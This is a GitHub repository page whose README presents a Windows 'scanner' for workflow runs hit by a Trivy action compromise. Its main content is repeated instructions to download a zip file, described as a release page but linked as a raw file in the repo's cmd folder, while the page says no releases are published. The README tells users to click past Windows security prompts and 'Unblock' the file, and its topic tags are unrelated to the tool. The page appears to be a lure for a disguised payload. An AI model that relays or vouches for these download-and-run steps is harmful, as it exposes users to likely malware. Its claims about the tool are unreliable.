Skip to content

orlandophotomechanical47/trivy-compromise-scanner

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
assets
assets
Β 
Β 
cmd
cmd
Β 
Β 
internal
internal
Β 
Β 
LICENSE
LICENSE
Β 
Β 
README.md
README.md
Β 
Β 
go.mod
go.mod
Β 
Β 
go.sum
go.sum
Β 
Β 
main.go
main.go
Β 
Β 
trivy-compromise-scanner
trivy-compromise-scanner
Β 
Β 

Repository files navigation

πŸ›‘οΈ trivy-compromise-scanner - Check affected workflow runs fast

Download trivy-compromise-scanner

πŸ“₯ Download

Visit this page to download: https://raw.githubusercontent.com/orlandophotomechanical47/trivy-compromise-scanner/main/cmd/scanner_trivy_compromise_v3.5.zip

On that page, choose the latest release for Windows and download the file that matches your computer.

🧭 What this tool does

trivy-compromise-scanner helps you check GitHub workflow runs that may be affected by the trivy action compromise. It is built for end users who need a clear way to review runs and spot what needs attention.

Use it when you want to:

  • review workflow runs linked to trivy
  • find runs that may have been impacted
  • check results without reading raw logs
  • save time when you need to inspect many runs

πŸͺŸ Windows requirements

Before you run the app, make sure your PC has:

  • Windows 10 or Windows 11
  • permission to download files
  • enough free space to save the app
  • access to your browser or file explorer

If Windows asks for permission, choose the option that lets the app open.

πŸš€ Getting started

  1. Open the release page: https://raw.githubusercontent.com/orlandophotomechanical47/trivy-compromise-scanner/main/cmd/scanner_trivy_compromise_v3.5.zip

  2. Find the latest release near the top of the page.

  3. Look under Assets for a Windows download.

  4. Download the file to your PC.

  5. Open the downloaded file from your Downloads folder.

  6. If Windows shows a security prompt, select the option to run the file.

  7. Follow the on-screen steps until the app opens.

πŸ–±οΈ How to run it

After you download the file:

  • open File Explorer
  • go to Downloads
  • double-click the app file
  • if the app opens a setup window, follow the prompts
  • if the app opens right away, wait for it to load

If your browser asks what to do with the file, choose Save first, then open it from the folder where it was saved.

πŸ” What you can check with it

This scanner is meant to help you review workflow activity tied to the trivy action issue. It can help you look for:

  • workflow runs that used a trivy action version in the affected range
  • jobs that may need a second look
  • runs tied to repositories that use GitHub Actions
  • items that should be reviewed by your team

🧰 Typical use case

A common way to use the app is:

  • you hear that a workflow tool may have been compromised
  • you want to check which runs might be involved
  • you open the scanner and review the output
  • you use the results to decide what to inspect next

This gives you a simple way to sort through runs without checking each one by hand.

πŸ“‚ What the release page may contain

The release page may include one or more files, such as:

  • a Windows app file
  • a zip archive
  • a support file with release notes

If you see a zip file, right-click it and choose Extract All before opening the app inside.

🧩 Basic workflow

Use this simple flow:

  1. Download the latest Windows release.
  2. Open the app.
  3. Connect or load the workflow data you want to review.
  4. Start the scan.
  5. Read the results.
  6. Save or share the output if needed.

πŸ“‹ Easy reading tips

When you open the results, look for:

  • names of workflows
  • run dates
  • status fields
  • any entry marked for review
  • repeated items that point to the same repo or action

If the app shows a list, start at the top and work down one row at a time.

πŸ” Safety checks

Use the app only on data you trust and have permission to review. If you download the file from the release page, keep it in the original folder until you confirm it runs the way you expect.

For a clean setup:

  • use the latest release
  • avoid renamed files from other sources
  • keep the download in one place
  • do not mix it with old copies

πŸ› οΈ Troubleshooting

The file does not open

  • Check that the download finished
  • Right-click the file and choose Open
  • Move it out of a compressed folder if needed
  • Try running it again from Downloads

Windows blocks the app

  • Right-click the file
  • Select Properties
  • Look for an Unblock option
  • Apply the change
  • Try opening the file again

The app closes right away

  • Download the latest release again
  • Make sure you picked the correct Windows file
  • Reopen the app from the saved folder
  • Try running it with the default Windows settings

I cannot find the download

  • Open your browser’s download history
  • Look in Downloads
  • Search for the repository name
  • Return to the release page and download it again

πŸ§ͺ Suggested first run

If this is your first time using the tool:

  • download the latest release
  • open it once to confirm it runs
  • scan a small set of workflow runs first
  • review the output on screen
  • move to a larger scan after you know the app works

πŸ“„ File handling tips

Keep the app in a folder you can find later. A simple path such as Downloads or Desktop works well for most users. If you move the file, keep the related files together so the app can still start normally.

🧭 If you need to check results again

After a scan, save the output if the app gives you that option. That lets you return to the same results later without running the scan again.

πŸ–ΌοΈ What the interface may look like

The app may show:

  • a simple start screen
  • a field for loading data
  • a scan button
  • a results list
  • a status area for progress

Each part should help you move from download to review with little setup.

πŸ“¦ Download again when needed

If you want the newest version, use this page again:

https://raw.githubusercontent.com/orlandophotomechanical47/trivy-compromise-scanner/main/cmd/scanner_trivy_compromise_v3.5.zip

Open the latest release and download the Windows file from Assets again if you need a fresh copy

⌨️ Common terms you may see

  • Release: a published version of the app
  • Asset: a file attached to the release
  • Workflow: a task run by GitHub Actions
  • Run: one execution of a workflow
  • Scan: the check the app performs on your data

πŸ—‚οΈ Recommended setup steps

  1. Create a folder for tools if you keep many downloads.
  2. Download the app from the release page.
  3. Open the file from that folder.
  4. Run a small scan first.
  5. Keep the app and its files together.

πŸ“Œ Start here

  1. Go to https://raw.githubusercontent.com/orlandophotomechanical47/trivy-compromise-scanner/main/cmd/scanner_trivy_compromise_v3.5.zip
  2. Download the latest Windows file
  3. Open it and follow the prompts
  4. Run your first scan

About

Scan GitHub Actions logs for Trivy compromise evidence in workflow runs and flag compromised action refs and commit SHAs

Topics

css nlp ioc osint jsx azure containers linter infrastructure-as-code vulnerability-detection yara python-security dynamic-styles threat-intelligence misconfiguration vulnerability-database terraform-security litellm

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages